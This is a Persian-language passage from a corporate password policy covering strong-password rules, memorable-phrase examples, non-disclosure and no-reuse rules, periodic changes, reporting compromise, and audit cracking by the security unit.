· حداقل هشت حرف دارند.
· کلمه ای در هیچ زبان، گویش یا صنف خاص نیستند.
· برپایه اطلاعات شخصی، اسم یا فامیل نیستند.
· کلمات عبور هرگز نباید نوشته یا جایی ذخیره شوند. سعی کنید کلمات عبوری انتخاب کنید که بتوانید براحتی در ذهن داشته باشید. یک روش انجام این کار، ایجاد کلمه عبور بر پایه یک ترانه یا عبارت است. برای مثال عبارت “This May Be One Way To Remember” و کلمه عبور می تواند “TmB1w2R!” یا “Tmb1W>r~” یا انواع دیگری از همین الگو باشد.
توجه: این مثالها را بعنوان کلمه عبور استفاده نکنید.
استانداردهای حفاظت از کلمه عبور
از کلمات عبور مشترک برای اکانتهای شرکت و دسترسی های شخصی استفاده نکنید. تا جایی ممکن است، از کلمه عبور مشترک برای نیازهای مختلف شرکت استفاده نکنید. برای مثال، برای سیستمهای مهندسی یک کلمه عبور انتخاب کنید و یک کلمه عبور دیگر برای سیستمهای IT . همچنین برای استفاده از اکانتهای NT و UNIX کلمات عبور متفاوت انتخاب کنید.
کلمات عبور شرکت با هیچ کس از جمله دستیاران و منشی ها در میان نگذارید. باید با تمام کلمات عبور بصورت اطلاعات حساس و محرمانه برخورد شوند.
در اینجا به لیستی از “انجام ندهید ”ها اشاره می شود.
· کلمه عبور را از طریق تلفن به هیچ کس نگویید.
· کلمه عبور را از طریق ایمیل فاش نکنید.
· کلمه عبور را به رئیس نگویید
· در مورد کلمه عبور در جلوی دیگران صحبت نکنید.
· به قالب کلمه عبور اشاره نکنید (مثلا نام خانوادگی)
· کلمه عبور را روی فهرست سوالات یا فرمهای امنیتی درج نکنید.
· کلمه عبور را با اعضای خانواده در میان نگذارید.
· کلمه عبور را هنگامی که در مرخصی هستید به همکاران نگویید.
اگر کسی از شما کلمه عبور را پرسید، از ایشان بخواهید که این مطلب را مطالعه کند یا اینکه با کسی در قسمت امنتیت اطلاعات تماس بگیرد.
از ویژگی “Remember Password” یا حفظ کلمه عبور در کامپیوتر استفاده نکنید.
مجددا، کلمات عبور را در هیچ جای محل کار خود ننویسید و در فایل یا هر سیستم کامپیوتری ذخیره نکیند (شامل کامپیوترهای دستی) مگر با رمزکردن.
کلمات عبور را حداقل هر شش ماه عوض کنید (بجز کلمات عبور سطح سیستم که باید هر سه ماه تغییر کنند).
اگر هر اکانت یا کلمه عبور احتمال فاش و سوءاستفاده از آن میرود، به بخش امنیت اطلاعات اطلاع دهید و تمام کلمات عبور را تغییر دهید.
شکستن یا حدس زدن کلمه عبور ممکن است در یک زمان متناوب یا اتفاقی توسط بخش امنیت اطلاعات یا نمانیدگی های آن رخ دهد. اگر کلمه عبور در طول یکی از این پیمایش ها حدس زده یا شکسته شود، از کاربر خواسته خواهد شد که آن را تغییر دهد.
رعایت موارد مذکور، به حفاظت بیشتر از اطلاعات و قسمتهای شخصی افراد کمک خواهد کرد.